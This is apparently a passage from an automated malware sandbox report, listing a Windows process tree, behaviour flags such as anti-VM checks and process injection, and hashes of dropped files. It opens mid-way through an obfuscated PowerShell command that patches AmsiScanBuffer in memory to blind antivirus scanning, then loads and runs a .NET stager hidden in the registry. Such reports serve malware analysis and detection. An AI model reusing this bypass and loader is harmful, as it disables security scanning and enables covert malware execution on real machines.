$_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+[Char](109)+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+'i'+''+'n'+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+'f'+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+'i'+'v'+''+'e'+''+'M'+'et'+[Char](104)+'o'+[Char](100)+'s');$KxbSTMvKXWVOcD=$ugtWeUYzVAgJn.GetMethod(''+[Char](71)+''+'e'+''+'t'+'P'+'r'+''+'o'+'c'+[Char](65)+''+'d'+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags]('P'+[Char](117)+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZTBhYVTCDczgfZPNLNU=SHDTvOeefjQR @([String])([IntPtr]);$jNjqJUgULnQEnfYUUVVtnR=SHDTvOeefjQR @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SZBFqTIfLCM=$ugtWeUYzVAgJn.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+'du'+'l'+''+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+'l')));$VruUQxkpTBVYNU=$KxbSTMvKXWVOcD.Invoke($Null,@([Object]$SZBFqTIfLCM,[Object](''+'L'+''+[Char](111)+''+'a'+''+[Char](100)+'L'+'i'+'b'+[Char](114)+''+'a'+'r'+'y'+''+[Char](65)+'')));$RevOGNHrgeAImnage=$KxbSTMvKXWVOcD.Invoke($Null,@([Object]$SZBFqTIfLCM,[Object]('Vir'+[Char](116)+'u'+[Char](97)+''+[Char](108)+'P'+[Char](114)+''+'o'+''+[Char](116)+'ect')));$mdVZoxx=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VruUQxkpTBVYNU,$ZTBhYVTCDczgfZPNLNU).Invoke('a'+'m'+'si'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$PajewgEzorcPOFbBB=$KxbSTMvKXWVOcD.Invoke($Null,@([Object]$mdVZoxx,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+''+'a'+''+[Char](110)+'Bu'+[Char](102)+'f'+[Char](101)+''+'r'+'')));$sBYLAmQthB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RevOGNHrgeAImnage,$jNjqJUgULnQEnfYUUVVtnR).Invoke($PajewgEzorcPOFbBB,[uint32]8,4,[ref]$sBYLAmQthB);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$PajewgEzorcPOFbBB,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RevOGNHrgeAImnage,$jNjqJUgULnQEnfYUUVVtnR).Invoke($PajewgEzorcPOFbBB,[uint32]8,0x20,[ref]$sBYLAmQthB);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue('$'+[Char](55)+'7'+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:468
-
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2148
-
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3236
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1448
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1508
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2456
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1664
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1716
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1728
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1796
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1876
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1352
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1348
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:1568
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2140
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2288
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2732
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2740
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2852
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2912
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2944
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2964
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2980
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3168
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3312
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3496 -
C:\Users\Admin\AppData\Local\Temp\ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe"C:\Users\Admin\AppData\Local\Temp\ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4548 -
C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe"C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Users\Admin\AppData\Local\Temp\$77ea4744"C:\Users\Admin\AppData\Local\Temp\$77ea4744"5⤵
- Executes dropped EXE
PID:704
-
-
C:\Users\Admin\AppData\Local\Temp\$77c1559d"C:\Users\Admin\AppData\Local\Temp\$77c1559d"5⤵
- Executes dropped EXE
PID:4108 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 3086⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4672
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 3166⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1364
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3652
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3860
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:4036
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4100
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2096
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:3340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4960
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:1860
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1556
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:960
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4788
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵PID:956
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window1⤵PID:4664
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.118 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.80 --initial-client-data=0x238,0x23c,0x240,0x234,0x25c,0x7ffe970dceb8,0x7ffe970dcec4,0x7ffe970dced02⤵PID:4476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1952,i,11266875042087428226,16669718873272757238,262144 --variations-seed-version --mojo-platform-channel-handle=3272 /prefetch:32⤵PID:1356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4116,i,11266875042087428226,16669718873272757238,262144 --variations-seed-version --mojo-platform-channel-handle=4092 /prefetch:82⤵PID:4108
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:5040
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:512
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2128
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:4984 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4108 -ip 41082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4108 -ip 41082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4192
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
13KB
MD5671240693296a58f31504342cbf35582
SHA1ac63410de95a6545341f6d1f2ad797565f08bd4c
SHA25600777e46d1424ea6aae426a14f51b8421cac0c34bb9335901413c98ba4f8d660
SHA51222505054961c83db33f584f026699ac594e91c9c167a3f66a4942e336fdf092053ae29b2c4161476bea3e977f6f0ed320fc1f8fdf99604994899a8be3cb5e318
-
Filesize
39KB
MD5211786e0cab2892a8c6718e1f975dc07
SHA1a10cd997e5df4671d1719385c978e6c14a9fc60c
SHA25635684a8b85fdf315469b644e63963ce2b01d81d4da6191e6fedca60ef3db1190
SHA5127c51127823359253b6ee94648fd2b181b0830ba8a71e8a9ecb08d172d329aa89f3c3dc4e0e728008a687e792475c474228a9cde1ac308933e9b64ec97095168c
-
Filesize
38KB
MD53c734d1a10bd60182bf6965ba034fa2d
SHA1ffa544c5a170f41cd6b5689549e26ff8254255c4
SHA2568fd1c8dbf7e9d975e397deedfb340b5cc5017d3aa794d8ea8b1337c2579d9a3d
SHA512879734e6a3ace13d94b4d46c3d460b8bbf5b53e8b9e0384f5ac7ca89c88d058e552ff0792ff94cd839a5db18d2ebb4c64f1e48273bfa7aad5f9819d34678beb8
-
Filesize
13KB
MD54fd3a3f78f40f87a0242b77edfd8ca46
SHA116392471281903db2f619bddb43d95ab667df8a4
SHA2566b5c76c10cb532ad4262ca62dd42b8cae06e1b4ed5a338adfa96b8684dcc50e9
SHA51247fa709f3957a79316a6d612718693d432857feb9cbe36f9a49691ea7bddd94b3e7b7ad3d99bfcf28e3f2336f1d4437e0fb762f5dc1475f77e1914373368f25c
-
Filesize
47KB
MD5924cf990ea240e3b853659e8ae75c887
SHA1417bc6f640d78d244775ac35cfb098b39ab91c78
SHA256ffc90b11b1da01e5daef5f80ebef5735a4f761e3039480e8f69714839c52704e
SHA5128f3f4b7e4554bfe14778263eb075a5fffcecc3a6e2ef2480fd5d9a8b7d91e2d8bdd3266222f0c4e5c6d0111c0aa43080ee1c4c5d432d03eb59f5e7c4cda18b1d
-
Filesize
4.5MB
MD5133fda00a490e613f3a6c511c1c660eb
SHA1e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9
SHA256cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169
SHA512f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd
-
Filesize
1.8MB
MD5a99882f9b749bc3828ae0bbba5f8ab42
SHA1245713f0928010e1534fd2ddef7788b77ebeabde
SHA256ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd
SHA5129c641af50a8132673e0af32f1eee948bba1a4d6156e76d1141f7fcefc8078b8abe8360c50878ba95899669ee952b988d0169eb9bc3a0a246d9a91af60cb151a5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82